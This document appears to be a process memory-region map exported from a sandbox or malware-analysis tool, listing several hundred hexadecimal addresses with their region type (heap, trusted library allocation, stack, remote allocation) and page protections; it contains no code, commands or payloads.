2434DA90000
heap
page read and write
24368159000
trusted library allocation
page read and write
2435EFA5000
trusted library allocation
page read and write
243637F7000
trusted library allocation
page read and write
2435B665000
trusted library allocation
page read and write
B77B000
heap
page read and write
2434DAC8000
heap
page read and write
B9F98CE000
stack
page read and write
2434DA9B000
heap
page read and write
2435E1EC000
trusted library allocation
page read and write
2435749E000
trusted library allocation
page read and write
2434DA76000
heap
page read and write
243577AA000
heap
page read and write
184C70E2000
unclassified section
page read and write
2435C9C2000
trusted library allocation
page read and write
243658C1000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2435C09B000
trusted library allocation
page read and write
2435DF4A000
trusted library allocation
page read and write
438000
unkown
page readonly
2436523B000
trusted library allocation
page read and write
243658DE000
trusted library allocation
page read and write
243650B2000
trusted library allocation
page read and write
2435DE39000
trusted library allocation
page read and write
2435B533000
trusted library allocation
page read and write
2434DA76000
heap
page read and write
243653E3000
trusted library allocation
page read and write
2435BA23000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
24369356000
trusted library allocation
page read and write
2435DFE0000
trusted library allocation
page read and write
3F7919603000
trusted library allocation
page read and write
2435C9DA000
trusted library allocation
page read and write
24365893000
trusted library allocation
page read and write
2435EFDC000
trusted library allocation
page read and write
2435E28B000
trusted library allocation
page read and write
2435E267000
trusted library allocation
page read and write
243637D2000
trusted library allocation
page read and write
2434DAC7000
heap
page read and write
2435BA43000
trusted library allocation
page read and write
2435DC6F000
trusted library allocation
page read and write
3B00000
direct allocation
page read and write
2435B4E9000
trusted library allocation
page read and write
2435EF9C000
trusted library allocation
page read and write
24368028000
trusted library allocation
page read and write
243680D0000
trusted library allocation
page read and write
2769000
heap
page read and write
2435EF6C000
trusted library allocation
page read and write
2435E45F000
trusted library allocation
page read and write
2435EFEE000
trusted library allocation
page read and write
184C7DB9000
heap
page read and write
2436338A000
trusted library allocation
page read and write
243638B5000
trusted library allocation
page read and write
2435C0E5000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
2435CC9F000
trusted library allocation
page read and write
2436523D000
trusted library allocation
page read and write
2BB2000
heap
page read and write
184C7D51000
heap
page read and write
2435ED9C000
trusted library allocation
page read and write
1F527703000
trusted library allocation
page read and write
243656C0000
trusted library allocation
page read and write
2435DFBA000
trusted library allocation
page read and write
2435DD21000
trusted library allocation
page read and write
184C7E4C000
heap
page read and write
2434DAB9000
heap
page read and write
2434DAC1000
heap
page read and write
3650000
direct allocation
page read and write
2435C0D9000
trusted library allocation
page read and write
2435BA3A000
trusted library allocation
page read and write
243658D3000
trusted library allocation
page read and write
243577D3000
heap
page read and write
2435E1C5000
trusted library allocation
page read and write
2435BA32000
trusted library allocation
page read and write
2435DF60000
trusted library allocation
page read and write
2435DFF9000
trusted library allocation
page read and write
2435C8BB000
trusted library allocation
page read and write
24358DF2000
trusted library allocation
page read and write
2435EF84000
trusted library allocation
page read and write
2435BABB000
trusted library allocation
page read and write
2435EE9A000
trusted library allocation
page read and write
2435B8C7000
trusted library allocation
page read and write
184C7DFA000
heap
page read and write
2435E2F5000
trusted library allocation
page read and write
2435EFBB000
trusted library allocation
page read and write
2435C8AE000
trusted library allocation
page read and write
2435DFDD000
trusted library allocation
page read and write
2435B7CA000
trusted library allocation
page read and write
2435D082000
trusted library allocation
page read and write
2435D088000
trusted library allocation
page read and write
243683DE000
trusted library allocation
page read and write
3860000
direct allocation
page read and write
2435E278000
trusted library allocation
page read and write
2436371C000
trusted library allocation
page read and write
2435DF76000
trusted library allocation
page read and write
2435BA5C000
trusted library allocation
page read and write
24365852000
trusted library allocation
page read and write
2435ED43000
trusted library allocation
page read and write
4682D3E000
stack
page read and write
2435B69C000
trusted library allocation
page read and write
2435E17B000
trusted library allocation
page read and write
2435BA93000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2435DF51000
trusted library allocation
page read and write
2BB2000
heap
page read and write
184C6EF7000
remote allocation
page execute read
243689D6000
trusted library allocation
page read and write
24358DC3000
trusted library allocation
page read and write
2435E2F9000
trusted library allocation
page read and write
2B00000
heap
page read and write
2435DDF2000
trusted library allocation
page read and write
2435E236000
trusted library allocation
page read and write
2435C75F000
trusted library allocation
page read and write
B9F998E000
unkown
page readonly
24363432000
trusted library allocation
page read and write
2F40000
direct allocation
page read and write
2435E0E2000
trusted library allocation
page read and write
2435C09F000
trusted library allocation
page read and write
2435EFB6000
trusted library allocation
page read and write
424E000
direct allocation
page read and write
B9FA3D8000
stack
page read and write
243652CA000
trusted library allocation
page read and write
2435BAC9000
trusted library allocation
page read and write
2435E2F9000
trusted library allocation
page read and write
2435BAF4000
trusted library allocation
page read and write
24363440000
trusted library allocation
page read and write
9B000
stack
page read and write
24363400000
trusted library allocation
page read and write
2435DDBB000
trusted library allocation
page read and write
3A80000
direct allocation
page read and write
243654B8000
trusted library allocation
page read and write
3540000
direct allocation
page read and write
432000
unkown
page write copy
2435E0E8000
trusted library allocation
page read and write
31A6000
heap
page read and write
184C7EC9000
heap
page read and write
24359380000
trusted library allocation
page read and write
2434DAB5000
heap
page read and write
2434DAB0000
heap
page read and write
2435E11D000
trusted library allocation
page read and write
24368141000
trusted library allocation
page read and write
3780000
direct allocation
page read and write
24358FF6000
trusted library allocation
page read and write
184C7E30000
heap
page read and write
2435CF63000
trusted library allocation
page read and write
38B0000
direct allocation
page read and write
2435C7F5000
trusted library allocation
page read and write
2435B4F0000
trusted library allocation
page read and write
24358FE8000
trusted library allocation
page read and write
2435DFF4000
trusted library allocation
page read and write
2435E13A000
trusted library allocation
page read and write
2417000
heap
page read and write
2435DEBD000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2A6D000
heap
page read and write
1B0F000
stack
page read and write
322A000
heap
page read and write
2434D0FD000
heap
page read and write
2435C81F000
trusted library allocation
page read and write
3B30000
direct allocation
page read and write
2435C7EB000
trusted library allocation
page read and write
2435DD1B000
trusted library allocation
page read and write
2434DAB5000
heap
page read and write
2435EF25000
trusted library allocation
page read and write
24368141000
trusted library allocation
page read and write
3520000
direct allocation
page read and write
2435ED2C000
trusted library allocation
page read and write
2435E2F5000
trusted library allocation
page read and write
B653000
heap
page read and write
2435ED1B000
trusted library allocation
page read and write
243637CD000
trusted library allocation
page read and write
2435B7A1000
trusted library allocation
page read and write
25EFE1D6000
heap
page read and write
2ABB000
heap
page read and write
243680E2000
trusted library allocation
page read and write
2434DADD000
heap
page read and write
2435E14A000
trusted library allocation
page read and write
24359200000
trusted library allocation
page read and write
2435E256000
trusted library allocation
page read and write
243680F6000
trusted library allocation
page read and write
2435E1F0000
trusted library allocation
page read and write
2435E2D6000
trusted library allocation
page read and write
243577CA000
heap
page read and write
24358DB1000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
2434DA7E000
heap
page read and write
184C7DBC000
heap
page read and write
2435C0E0000
trusted library allocation
page read and write
2A56000
heap
page read and write
24358F81000
trusted library allocation
page read and write
2435C8E1000
trusted library allocation
page read and write
184C7EE9000
heap
page read and write
2FB1000
direct allocation
page read and write
B381000
heap
page read and write
24369675000
heap
page read and write
2435C0DD000
trusted library allocation
page read and write
2435C759000
trusted library allocation
page read and write
3950000
direct allocation
page read and write
2435B462000
trusted library allocation
page read and write
B45A000
heap
page read and write
2435C8E3000
trusted library allocation
page read and write
243680C8000
trusted library allocation
page read and write
2434DABF000
heap
page read and write
2436844B000
trusted library allocation
page read and write
2435B8BD000
trusted library allocation
page read and write
243681E1000
trusted library allocation
page read and write
2434DAB5000
heap
page read and write
24368B28000
trusted library allocation
page read and write
2B19000
heap
page read and write
2435E11B000
trusted library allocation
page read and write
24363469000
trusted library allocation
page read and write
243574B3000
trusted library allocation
page read and write
2435E24E000
trusted library allocation
page read and write
24358FFE000
trusted library allocation
page read and write
243656F7000
trusted library allocation
page read and write
24365812000
trusted library allocation
page read and write
2435EFFA000
trusted library allocation
page read and write
2435E14D000
trusted library allocation
page read and write
243650D7000
trusted library allocation
page read and write
243577D3000
heap
page read and write
2434DA7E000
heap
page read and write
2435BAC9000
trusted library allocation
page read and write
2435E2E5000
trusted library allocation
page read and write
2435E21D000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
2435EFA5000
trusted library allocation
page read and write
3D00000
direct allocation
page read and write
2435B7A1000
trusted library allocation
page read and write
2435C0E5000
trusted library allocation
page read and write
2435EFEE000
trusted library allocation
page read and write
24368ACA000
trusted library allocation
page read and write
2434DA86000
heap
page read and write
2434DA89000
heap
page read and write
2435E15D000
trusted library allocation
page read and write
2435DFA7000
trusted library allocation
page read and write
2434DADC000
heap
page read and write
2436848E000
trusted library allocation
page read and write
2435CD2C000
trusted library allocation
page read and write
24369312000
trusted library allocation
page read and write
2435EDC2000
trusted library allocation
page read and write
324F000
heap
page read and write
2435C8A4000
trusted library allocation
page read and write
2435CE77000
trusted library allocation
page read and write
2434DA76000
heap
page read and write
2435E140000
trusted library allocation
page read and write
2435C8FA000
trusted library allocation
page read and write
2BB2000
heap
page read and write
243684B2000
trusted library allocation
page read and write
6F0000
heap
page read and write
2435B889000
trusted library allocation
page read and write
2435DFF9000
trusted library allocation
page read and write
2435DF85000
trusted library allocation
page read and write
2435E240000
trusted library allocation
page read and write
2434DAD0000
heap
page read and write
2435E086000
trusted library allocation
page read and write
24358DAD000
trusted library allocation
page read and write
2435C7EB000
trusted library allocation
page read and write
295AB790000
heap
page read and write
37D1000
heap
page read and write
2434DABC000
heap
page read and write
243638C1000
trusted library allocation
page read and write
2BB2000
heap
page read and write
24368139000
trusted library allocation
page read and write
24365420000
trusted library allocation
page read and write
24365265000
trusted library allocation
page read and write
243577BF000
heap
page read and write
2435BA13000
trusted library allocation
page read and write
2435DB7C000
trusted library allocation
page read and write
2435C8F5000
trusted library allocation
page read and write
2435EDF1000
trusted library allocation
page read and write
25EFE562000
trusted library allocation
page read and write
2434DA89000
heap
page read and write
2435B4F1000
trusted library allocation
page read and write
243652A4000
trusted library allocation
page read and write
24368108000
trusted library allocation
page read and write
2435C753000
trusted library allocation
page read and write
24368334000
trusted library allocation
page read and write
2434DAC1000
heap
page read and write
2435ED94000
trusted library allocation
page read and write
2BB2000
heap
page read and write
3840000
direct allocation
page read and write
2434DAC1000
heap
page read and write
2B81000
heap
page read and write
2434DACA000
heap
page read and write
2434DABF000
heap
page read and write
BB10000
heap
page read and write
2435E15F000
trusted library allocation
page read and write
401000
unkown
page execute read
24368976000
trusted library allocation
page read and write
3852000
heap
page read and write
2435DFDB000
trusted library allocation
page read and write
2435E24C000
trusted library allocation
page read and write
2434DA90000
heap
page read and write
243681FC000
trusted library allocation
page read and write
B8C4000
heap
page read and write
2435BA99000
trusted library allocation
page read and write
2435B89A000
trusted library allocation
page read and write
2BB2000
heap
page read and write
3CE0000
direct allocation
page read and write
2435DFD1000
trusted library allocation
page read and write
2434DADA000
heap
page read and write
2435C752000
trusted library allocation
page read and write
243577A1000
heap
page read and write
2435E13C000
trusted library allocation
page read and write
184C7D9D000
heap
page read and write
2435B4DF000
trusted library allocation
page read and write
28F4000
heap
page read and write
2435EFF2000
trusted library allocation
page read and write
2435C958000
trusted library allocation
page read and write
2435C792000
trusted library allocation
page read and write
243577D3000
heap
page read and write
2434D081000
heap
page read and write
243652DD000
trusted library allocation
page read and write
2435B44D000
trusted library allocation
page read and write
2435C8ED000
trusted library allocation
page read and write
2435DF6A000
trusted library allocation
page read and write
2434DABC000
heap
page read and write
2434DAB6000
heap
page read and write
2435C739000
trusted library allocation
page read and write
2435EF27000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
24359380000
trusted library allocation
page read and write
2434DAB6000
heap
page read and write
243658EE000
trusted library allocation
page read and write
243638AA000
trusted library allocation
page read and write
C98000
unkown
page readonly
2435C79D000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
295AB649000
heap
page read and write
2435D0A1000
trusted library allocation
page read and write
B403000
heap
page read and write
184C7E30000
heap
page read and write
2435E121000
trusted library allocation
page read and write
2435E0CE000
trusted library allocation
page read and write
2BB2000
heap
page read and write
24365345000
trusted library allocation
page read and write
2435E1F6000
trusted library allocation
page read and write
2435BA3E000
trusted library allocation
page read and write
2BB2000
heap
page read and write
318F000
heap
page read and write
2435EF7F000
trusted library allocation
page read and write
243577B7000
heap
page read and write
2435D05A000
trusted library allocation
page read and write
2435E24C000
trusted library allocation
page read and write
2434DA7E000
heap
page read and write
2BB2000
heap
page read and write
24368A83000
trusted library allocation
page read and write
24369605000
heap
page read and write
24368963000
trusted library allocation
page read and write
24365882000
trusted library allocation
page read and write
25EFE55F000
trusted library allocation
page read and write
1F527350000
remote allocation
page read and write
2435C8EC000
trusted library allocation
page read and write
2435BA6F000
trusted library allocation
page read and write
243654F9000
trusted library allocation
page read and write
B653000
heap
page read and write
2434DA90000
heap
page read and write
2435B878000
trusted library allocation
page read and write
2434DA78000
heap
page read and write
2434DAB0000
heap
page read and write
2435C86E000
trusted library allocation
page read and write
3C20000
direct allocation
page read and write
2435EFA0000
trusted library allocation
page read and write
243638F1000
trusted library allocation
page read and write
2435B8C2000
trusted library allocation
page read and write
2435C080000
trusted library allocation
page read and write
2435E0DD000
trusted library allocation
page read and write
24358DC3000
trusted library allocation
page read and write
2435C066000
trusted library allocation
page read and write
2435EDC2000
trusted library allocation
page read and write
2435E140000
trusted library allocation
page read and write
2435E24C000
trusted library allocation
page read and write
2435C0DD000
trusted library allocation
page read and write
184C7100000
trusted library allocation
page read and write
24363750000
trusted library allocation
page read and write
2435E0A8000
trusted library allocation
page read and write
243637CB000
trusted library allocation
page read and write
2435C0DD000
trusted library allocation
page read and write
2435DACE000
trusted library allocation
page read and write
243655FC000
trusted library allocation
page read and write
2435DF4A000
trusted library allocation
page read and write
24363392000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
2435B8E8000
trusted library allocation
page read and write
2435B413000
trusted library allocation
page read and write
184C7DAF000
heap
page read and write
184C7E30000
heap
page read and write
2434DAB5000
heap
page read and write
93C000
stack
page read and write
2435C80B000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
243680CF000
trusted library allocation
page read and write
2435E29D000
trusted library allocation
page read and write
2435C75F000
trusted library allocation
page read and write
184C6E90000
unclassified section
page readonly
2434DA8F000
heap
page read and write
2434DABC000
heap
page read and write
BB13000
heap
page read and write
2434DA76000
heap
page read and write
2435C704000
trusted library allocation
page read and write
2435E123000
trusted library allocation
page read and write
2435B8E8000
trusted library allocation
page read and write
24368A98000
trusted library allocation
page read and write
24363725000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
400000
unkown
page readonly
4681BFD000
stack
page read and write
24358DC6000
trusted library allocation
page read and write
2435CC3F000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
2435B4DF000
trusted library allocation
page read and write
1E8C1500000
trusted library allocation
page read and write
243684D9000
trusted library allocation
page read and write
24357DE4000
trusted library allocation
page read and write
2435DF81000
trusted library allocation
page read and write
2435EFAE000
trusted library allocation
page read and write
2435EF5C000
trusted library allocation
page read and write
2435E1C5000
trusted library allocation
page read and write
2434DA7D000
heap
page read and write
243681B7000
trusted library allocation
page read and write
24365256000
trusted library allocation
page read and write
243689F2000
trusted library allocation
page read and write
184C7E39000
heap
page read and write
2435E15D000
trusted library allocation
page read and write
243681DE000
trusted library allocation
page read and write
2435DF3F000
trusted library allocation
page read and write
243658AC000
trusted library allocation
page read and write
2436933F000
trusted library allocation
page read and write
2435DF62000
trusted library allocation
page read and write
2B00000
heap
page read and write
24358F89000
trusted library allocation
page read and write
243577B0000
heap
page read and write
24363830000
trusted library allocation
page read and write
24358F0F000
trusted library allocation
page read and write
243633CA000
trusted library allocation
page read and write
2435E2C4000
trusted library allocation
page read and write
24357758000
heap
page read and write
2436541B000
trusted library allocation
page read and write
184C7EB4000
heap
page read and write
BD19000
heap
page read and write
2434DADA000
heap
page read and write
2435E1F0000
trusted library allocation
page read and write
243681D4000
trusted library allocation
page read and write
2435ED08000
trusted library allocation
page read and write
24369605000
heap
page read and write
3857000
heap
page read and write
24364D30000
trusted library allocation
page read and write
2BB2000
heap
page read and write
24368382000
trusted library allocation
page read and write
2435EF07000
trusted library allocation
page read and write
2435EE4A000
trusted library allocation
page read and write
2435CC8B000
trusted library allocation
page read and write
2435B8B6000
trusted library allocation
page read and write
2436848E000
trusted library allocation
page read and write
2435E140000
trusted library allocation
page read and write
1BF7000
heap
page read and write
2434DABC000
heap
page read and write
2B1D000
heap
page read and write
24369300000
trusted library allocation
page read and write
2435B783000
trusted library allocation
page read and write
2434DABD000
heap
page read and write
2435C0F2000
trusted library allocation
page read and write
25EFE50E000
trusted library allocation
page read and write
2AC0000
heap
page read and write
2435BA60000
trusted library allocation
page read and write
ED057FE000
stack
page read and write
36E0000
direct allocation
page read and write
2435E123000
trusted library allocation
page read and write
2435C7F9000
trusted library allocation
page read and write
243652E0000
trusted library allocation
page read and write
2435E140000
trusted library allocation
page read and write
2435D46D000
trusted library allocation
page read and write
2435C09B000
trusted library allocation
page read and write
243684C4000
trusted library allocation
page read and write
2435B8C7000
trusted library allocation
page read and write
243658D3000
trusted library allocation
page read and write
2BB2000
heap
page read and write
67F000
stack
page read and write
243577B6000
heap
page read and write
243653FE000
trusted library allocation
page read and write
2435DFA7000
trusted library allocation
page read and write
2435DFF4000
trusted library allocation
page read and write
2436348B000
trusted library allocation
page read and write
2435B88D000
trusted library allocation
page read and write
3226000
heap
page read and write
184C7DAF000
heap
page read and write
1E8C1420000
heap
page read and write
2435DEB8000
trusted library allocation
page read and write
24368375000
trusted library allocation
page read and write
243577AA000
heap
page read and write
24363456000
trusted library allocation
page read and write
3900000
direct allocation
page read and write
2436345D000
trusted library allocation
page read and write
468357E000
stack
page read and write
2435BA3E000
trusted library allocation
page read and write
2435DFAD000
trusted library allocation
page read and write
25EFE80C000
trusted library allocation
page read and write
243650CC000
trusted library allocation
page read and write
24358F89000
trusted library allocation
page read and write
31AC000
heap
page read and write
900000
heap
page read and write
1F527900000
trusted library allocation
page read and write
24358DB1000
trusted library allocation
page read and write
2435C7F5000
trusted library allocation
page read and write
243652EB000
trusted library allocation
page read and write
BF0000
heap
page read and write
2436387A000
trusted library allocation
page read and write
2434DA8F000
heap
page read and write
2435BA88000
trusted library allocation
page read and write
2435E271000
trusted library allocation
page read and write
2435B4B1000
trusted library allocation
page read and write
468243E000
unkown
page readonly
2435C7F5000
trusted library allocation
page read and write
2434DA85000
heap
page read and write
243654A9000
trusted library allocation
page read and write
295A9C00000
trusted library allocation
page read and write
243574EF000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
2436347C000
trusted library allocation
page read and write
2436809F000
trusted library allocation
page read and write
2435EFE1000
trusted library allocation
page read and write
2435EF25000
trusted library allocation
page read and write
2435DD8E000
trusted library allocation
page read and write
2435EFEE000
trusted library allocation
page read and write
2436801E000
trusted library allocation
page read and write
243593CA000
trusted library allocation
page read and write
1F527919000
trusted library allocation
page read and write
2300000
heap
page read and write
184C72BC000
trusted library allocation
page read and write
2AFD000
heap
page read and write
2435CD00000
trusted library allocation
page read and write
1F527783000
trusted library allocation
page read and write
2436342D000
trusted library allocation
page read and write
24358DC3000
trusted library allocation
page read and write
2435DF2B000
trusted library allocation
page read and write
243680FA000
trusted library allocation
page read and write
1F527723000
trusted library allocation
page read and write
2435DF81000
trusted library allocation
page read and write
2436343C000
trusted library allocation
page read and write
1294000
unkown
page write copy
2435DD84000
trusted library allocation
page read and write
2435BA60000
trusted library allocation
page read and write
2435C03C000
trusted library allocation
page read and write
2435C7EB000
trusted library allocation
page read and write
24364D12000
trusted library allocation
page read and write
2435B463000
trusted library allocation
page read and write
2435EDD7000
trusted library allocation
page read and write
243683B6000
trusted library allocation
page read and write
2434DA7D000
heap
page read and write
2434DA9B000
heap
page read and write
24357796000
heap
page read and write
2435D050000
trusted library allocation
page read and write
2435DF5D000
trusted library allocation
page read and write
24358FFE000
trusted library allocation
page read and write
2435CD31000
trusted library allocation
page read and write
2435EFE5000
trusted library allocation
page read and write
184C725C000
trusted library allocation
page read and write
2435C707000
trusted library allocation
page read and write
2435C0D9000
trusted library allocation
page read and write
2435E164000
trusted library allocation
page read and write
2435DFA0000
trusted library allocation
page read and write
2435EE98000
trusted library allocation
page read and write
1E8C1770000
heap
page read and write
2436945D000
trusted library allocation
page read and write
24368315000
trusted library allocation
page read and write
243654E3000
trusted library allocation
page read and write
2435D4BC000
trusted library allocation
page read and write
2435C0FA000
trusted library allocation
page read and write
2435BA93000
trusted library allocation
page read and write
3099000
heap
page read and write
24368984000
trusted library allocation
page read and write
24368483000
trusted library allocation
page read and write
D9C000
stack
page read and write
2435EDAE000
trusted library allocation
page read and write
24358F64000
trusted library allocation
page read and write
243652CA000
trusted library allocation
page read and write
295AB65F000
heap
page read and write
2435BAF0000
trusted library allocation
page read and write
243689C6000
trusted library allocation
page read and write
2435D02E000
trusted library allocation
page read and write
2436822A000
trusted library allocation
page read and write
2435CC2D000
trusted library allocation
page read and write
2434DADA000
heap
page read and write
3A30000
direct allocation
page read and write
2435E128000
trusted library allocation
page read and write
2435E285000
trusted library allocation
page read and write
2434DAD0000
heap
page read and write
2435EF5C000
trusted library allocation
page read and write
2435E138000
trusted library allocation
page read and write
2435DEB6000
trusted library allocation
page read and write
243680ED000
trusted library allocation
page read and write
2435DF8E000
trusted library allocation
page read and write
2434DA8F000
heap
page read and write
24368363000
trusted library allocation
page read and write
2435C733000
trusted library allocation
page read and write
24368318000
trusted library allocation
page read and write
1F527600000
trusted library allocation
page read and write
2435DFC8000
trusted library allocation
page read and write
243683AE000
trusted library allocation
page read and write
2435E10B000
trusted library allocation
page read and write
243693AB000
trusted library allocation
page read and write
2435C732000
trusted library allocation
page read and write
243656FC000
trusted library allocation
page read and write
24369605000
heap
page read and write
2435CCA2000
trusted library allocation
page read and write
2436963A000
heap
page read and write
2435DFFB000
trusted library allocation
page read and write
184C72F5000
trusted library allocation
page read and write
2435E0EA000
trusted library allocation
page read and write
780000
heap
page read and write
2435C0FA000
trusted library allocation
page read and write
243633B2000
trusted library allocation
page read and write
2435E267000
trusted library allocation
page read and write
243638F1000
trusted library allocation
page read and write
3810000
heap
page read and write
24365872000
trusted library allocation
page read and write
243689D2000
trusted library allocation
page read and write
2435BAEC000
trusted library allocation
page read and write
2435B4BE000
trusted library allocation
page read and write
2434D0E4000
heap
page read and write
2434DA7D000
heap
page read and write
2434DA77000
heap
page read and write
243650AB000
trusted library allocation
page read and write
2435CD79000
trusted library allocation
page read and write
2435BA65000
trusted library allocation
page read and write
2434DA7B000
heap
page read and write
2435B46F000
trusted library allocation
page read and write
2435EFDC000
trusted library allocation
page read and write
3550000
direct allocation
page read and write
2435B4E2000
trusted library allocation
page read and write
184C7DF1000
heap
page read and write
2435E17B000
trusted library allocation
page read and write
243681DE000
trusted library allocation
page read and write
2435E2F7000
trusted library allocation
page read and write
2435C8C2000
trusted library allocation
page read and write
BADB000
heap
page read and write
2435EFDC000
trusted library allocation
page read and write
2435E0CA000
trusted library allocation
page read and write
1CB6000
heap
page read and write
2434DA7E000
heap
page read and write
2436347A000
trusted library allocation
page read and write
2435C8E1000
trusted library allocation
page read and write
243658B1000
trusted library allocation
page read and write
2435B692000
trusted library allocation
page read and write
2435DD26000
trusted library allocation
page read and write
2434DA9B000
heap
page read and write
24358D70000
trusted library allocation
page read and write
243638AB000
trusted library allocation
page read and write
2436838B000
trusted library allocation
page read and write
ED05FFE000
stack
page read and write
2435E1FE000
trusted library allocation
page read and write
24365361000
trusted library allocation
page read and write
2435EDC7000
trusted library allocation
page read and write
243638E9000
trusted library allocation
page read and write
2435B469000
trusted library allocation
page read and write
2435E137000
trusted library allocation
page read and write
2435C0EB000
trusted library allocation
page read and write
2436346F000
trusted library allocation
page read and write
24358FE0000
trusted library allocation
page read and write
24363741000
trusted library allocation
page read and write
2435E17B000
trusted library allocation
page read and write
184C7D50000
heap
page read and write
2435C761000
trusted library allocation
page read and write
2435B759000
trusted library allocation
page read and write
3BA0000
direct allocation
page read and write
243681CB000
trusted library allocation
page read and write
2435E19B000
trusted library allocation
page read and write
C98000
unkown
page readonly
243638CD000
trusted library allocation
page read and write
2435DF18000
trusted library allocation
page read and write
2434DAB5000
heap
page read and write
36F0000
direct allocation
page read and write
2435E2F1000
trusted library allocation
page read and write
2411000
heap
page read and write
184C70E0000
unclassified section
page read and write
2435E13A000
trusted library allocation
page read and write
24363430000
trusted library allocation
page read and write
2435C8BA000
trusted library allocation
page read and write
243638E9000
trusted library allocation
page read and write
2435EE1C000
trusted library allocation
page read and write
2434DACA000
heap
page read and write
24359363000
trusted library allocation
page read and write
2435D099000
trusted library allocation
page read and write
243680FA000
trusted library allocation
page read and write
2435BA5C000
trusted library allocation
page read and write
B4D000
stack
page read and write
2435E26F000
trusted library allocation
page read and write
2435BA88000
trusted library allocation
page read and write
243653C8000
trusted library allocation
page read and write
2435C7F5000
trusted library allocation
page read and write
2434DAD0000
heap
page read and write
2435BAC0000
trusted library allocation
page read and write
243689FC000
trusted library allocation
page read and write
2AA6000
heap
page read and write
24365099000
trusted library allocation
page read and write
2435C725000
trusted library allocation
page read and write
2434DAD0000
heap
page read and write
2435B8CD000
trusted library allocation
page read and write
2435D47E000
trusted library allocation
page read and write
2435B4C7000
trusted library allocation
page read and write
2435B87D000
trusted library allocation
page read and write
2435DEE1000
trusted library allocation
page read and write
2435D495000
trusted library allocation
page read and write
2435C72A000
trusted library allocation
page read and write
2436960B000
heap
page read and write
24357DA7000
trusted library allocation
page read and write
24358DF2000
trusted library allocation
page read and write
243638F4000
trusted library allocation
page read and write
2435E21E000
trusted library allocation
page read and write
321D000
heap
page read and write
24368997000
trusted library allocation
page read and write
2434DA84000
heap
page read and write
243658DC000
trusted library allocation
page read and write
2435C9F2000
trusted library allocation
page read and write
24365358000
trusted library allocation
page read and write
2435C725000
trusted library allocation
page read and write
1E8C1600000
trusted library allocation
page read and write
2435E13A000
trusted library allocation
page read and write
2435E137000
trusted library allocation
page read and write
2434DADE000
heap
page read and write
2435DF08000
trusted library allocation
page read and write
2435DF84000
trusted library allocation
page read and write
B600000
heap
page read and write
24363815000
trusted library allocation
page read and write
2435C0C6000
trusted library allocation
page read and write
2435EE1C000
trusted library allocation
page read and write
184C7E9A000
heap
page read and write
2436948E000
trusted library allocation
page read and write
2435E1C5000
trusted library allocation
page read and write
D41000
unkown
page execute read
2435E0AE000
trusted library allocation
page read and write
24369428000
trusted library allocation
page read and write
24363744000
trusted library allocation
page read and write
2435E1FE000
trusted library allocation
page read and write
24365208000
trusted library allocation
page read and write
2435C167000
trusted library allocation
page read and write
243655CA000
trusted library allocation
page read and write
2435EF84000
trusted library allocation
page read and write
243638C6000
trusted library allocation
page read and write
2436831F000
trusted library allocation
page read and write
2435DEBD000
trusted library allocation
page read and write
2434DACA000
heap
page read and write
3094000
heap
page read and write
40C000
unkown
page readonly
295AB647000
heap
page read and write
184C7EB4000
heap
page read and write
2436582F000
trusted library allocation
page read and write
1F527854000
heap
page read and write
2435EFC3000
trusted library allocation
page read and write
2435E4EC000
trusted library allocation
page read and write
2435C0FE000
trusted library allocation
page read and write
38D0000
direct allocation
page read and write
2435CD7D000
trusted library allocation
page read and write
2435B526000
trusted library allocation
page read and write
2435E287000
trusted library allocation
page read and write
2435EF7F000
trusted library allocation
page read and write
243638CD000
trusted library allocation
page read and write
2435B7A1000
trusted library allocation
page read and write
2434DABF000
heap
page read and write
2435B8C5000
trusted library allocation
page read and write
2435E271000
trusted library allocation
page read and write
2434DA78000
heap
page read and write
24365835000
trusted library allocation
page read and write
2435D041000
trusted library allocation
page read and write
2BB2000
heap
page read and write
243633BA000
trusted library allocation
page read and write
3B20000
direct allocation
page read and write
184C78B0000
heap
page read and write
2435DFEB000
trusted library allocation
page read and write
2435E1C5000
trusted library allocation
page read and write
2435C0EB000
trusted library allocation
page read and write
1294000
unkown
page read and write
24369605000
heap
page read and write
2435E1F8000
trusted library allocation
page read and write
24363498000
trusted library allocation
page read and write
2434DA7E000
heap
page read and write
24358F34000
trusted library allocation
page read and write
2435DFBA000
trusted library allocation
page read and write
2436581C000
trusted library allocation
page read and write
243658F6000
trusted library allocation
page read and write
3219000
heap
page read and write
24368AE5000
trusted library allocation
page read and write
46824BB000
stack
page read and write
2435B6DC000
trusted library allocation
page read and write
324F000
heap
page read and write
2435EF20000
trusted library allocation
page read and write
2436549B000
trusted library allocation
page read and write
3C60000
direct allocation
page read and write
4B1F000
stack
page read and write
2435EF7F000
trusted library allocation
page read and write
24365858000
trusted library allocation
page read and write
2434DAC8000
heap
page read and write
2435DDC3000
trusted library allocation
page read and write
24368334000
trusted library allocation
page read and write
184C7DB0000
heap
page read and write
2435C8C0000
trusted library allocation
page read and write
24358F13000
trusted library allocation
page read and write
243683D9000
trusted library allocation
page read and write
2435B649000
trusted library allocation
page read and write
24368363000
trusted library allocation
page read and write
24363400000
trusted library allocation
page read and write
243680CF000
trusted library allocation
page read and write
2435EFF2000
trusted library allocation
page read and write
2F8F000
stack
page read and write
2435E164000
trusted library allocation
page read and write
B728000
heap
page read and write
2435BA88000
trusted library allocation
page read and write
2435C72D000
trusted library allocation
page read and write
2435C929000
trusted library allocation
page read and write
2435D478000
trusted library allocation
page read and write
243680ED000
trusted library allocation
page read and write
2435B43B000
trusted library allocation
page read and write
24365879000
trusted library allocation
page read and write
24369400000
trusted library allocation
page read and write
2E80000
direct allocation
page read and write
D41000
unkown
page execute read
2434DAD8000
heap
page read and write
243655B3000
trusted library allocation
page read and write
2435C0AE000
trusted library allocation
page read and write
184C72C7000
trusted library allocation
page read and write
2435BA31000
trusted library allocation
page read and write
322C000
heap
page read and write
2435C749000
trusted library allocation
page read and write
24358D70000
trusted library allocation
page read and write
2434DA78000
heap
page read and write
40F000
unkown
page readonly
B77B000
heap
